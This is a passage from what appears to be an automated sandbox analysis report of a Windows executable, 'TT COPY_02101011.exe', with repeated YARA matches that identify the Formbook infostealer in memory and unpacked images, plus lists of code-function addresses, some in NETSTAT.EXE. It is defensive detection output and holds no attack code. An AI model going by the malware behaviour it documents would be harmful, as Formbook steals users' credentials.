          Source: Yara matchFile source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: TT COPY_02101011.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00406043
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00404618
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_0040681A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000C41B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10015A51
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10014272
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10013D00
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000C90F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000CD27
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000D15C
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000F16D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1001696C
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000D591
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_100147E4
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041D0EE
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041C154
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401174
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00408C90
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402D88
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B620A8
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB090
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B628EC
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51002
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9F900
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B622AE
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACEBB0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5DBD2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62B28
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA841F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5D466
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B625DD
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A90D20
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62D07
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B61D55
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D03DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032EE824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032EDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03236E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DD616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03210D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2D07
